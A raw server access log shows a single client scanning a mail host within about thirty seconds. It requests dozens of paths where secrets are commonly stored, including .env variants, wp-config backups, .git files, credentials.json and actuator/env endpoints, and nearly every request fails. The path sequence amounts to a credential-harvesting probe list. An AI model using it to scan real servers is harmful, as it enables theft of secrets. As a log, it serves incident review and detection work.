[14/Feb/2026:23:40:23 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/index.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:23 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/@vite/client" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:24 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/__env.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:24 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/vendor.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:24 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/stripe.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:24 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/checkout.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:25 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/payment.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:25 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/sw.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:25 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/config.json" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:25 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/env.json" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:26 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.vite/manifest.json" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:26 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.git/config" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:26 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.git/HEAD" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:27 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/index.html" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:28 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/checkout" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:28 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/robots.txt" [Client 185.177.72.60] [Length 26] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:28 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/sitemap.xml" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:28 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:29 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/api/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:29 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.vite" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:29 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/backend/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:29 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/laravel/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:30 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/payment/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:30 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/wp-config.php.bak" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:30 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/admin/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:30 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/wp-config.php.old" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:30 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.example" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:30 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/core/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:31 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:31 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/stripe/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:31 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.production" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:31 +0000] - - 301 - HEAD http mail.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:23:40:31 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.bak" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:32 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.local" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:32 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/wp-config.php.txt" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:32 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/assets/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:32 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/wp-config.php.save" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:32 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/app/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:32 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/config.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:33 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/docker/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:34 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/wp-config.php~" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:35 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/wp-content/debug.log" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:35 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/config.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:35 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.dev" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:35 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/main.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:35 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.staging" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:35 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/env.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:35 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/app.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:35 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.backup" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:36 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/constants.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:36 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.old" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:36 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/bundle.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:36 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.save" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:36 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/credentials.json" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:36 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/index.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:36 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.vscode/sftp.json" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:36 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/@vite/client" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:37 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/docker-compose.yml" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:37 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/__env.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:37 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/vendor.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:37 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/stripe.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:37 +0000] - - 400 - GET https mail.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
|
||||||
|
[14/Feb/2026:23:40:38 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/checkout.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:38 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/payment.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:38 +0000] - - 400 - GET https mail.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
|
||||||
|
[14/Feb/2026:23:40:38 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/sw.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:38 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/config.json" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:39 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/env.json" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:39 +0000] - - 400 - GET https mail.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
|
||||||
|
[14/Feb/2026:23:40:39 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.vite/manifest.json" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:39 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.git/HEAD" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:39 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/wp-config.php.bak" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:40 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/wp-config.php.old" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:40 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/wp-config.php.txt" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:40 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/wp-config.php.save" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:40 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/wp-config.php~" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:41 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/wp-content/debug.log" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:41 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.dev" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:41 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.staging" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:41 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.backup" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:42 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.old" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:42 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.save" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:42 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/credentials.json" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:42 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.vscode/sftp.json" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:43 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/docker-compose.yml" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:43 +0000] - - 400 - GET https mail.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
|
||||||
|
[14/Feb/2026:23:40:43 +0000] - - 400 - GET https mail.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
|
||||||
|
[14/Feb/2026:23:40:44 +0000] - - 400 - GET https mail.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
|
||||||
|
[14/Feb/2026:23:40:44 +0000] - - 400 - GET https mail.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
|
||||||
|
[14/Feb/2026:23:40:45 +0000] - - 400 - GET https mail.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
|
||||||
|
[14/Feb/2026:23:40:45 +0000] - - 400 - GET https mail.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
|
||||||
|
[14/Feb/2026:23:40:45 +0000] - - 400 - GET https mail.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
|
||||||
|
[14/Feb/2026:23:40:46 +0000] - - 400 - GET https mail.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
|
||||||
|
[14/Feb/2026:23:40:46 +0000] - - 400 - GET https mail.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
|
||||||
|
[14/Feb/2026:23:40:46 +0000] - - 400 - GET https mail.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
|
||||||
|
[14/Feb/2026:23:40:47 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/actuator/env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:47 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/actuator/configprops" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:47 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/manage/env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:48 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/manage/configprops" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:48 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/api/actuator/env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:48 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/admin/actuator/env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:48 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/v1/actuator/env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:49 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/v2/actuator/env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:49 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/configprops" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:49 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/api/config" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:52 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/api/settings" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
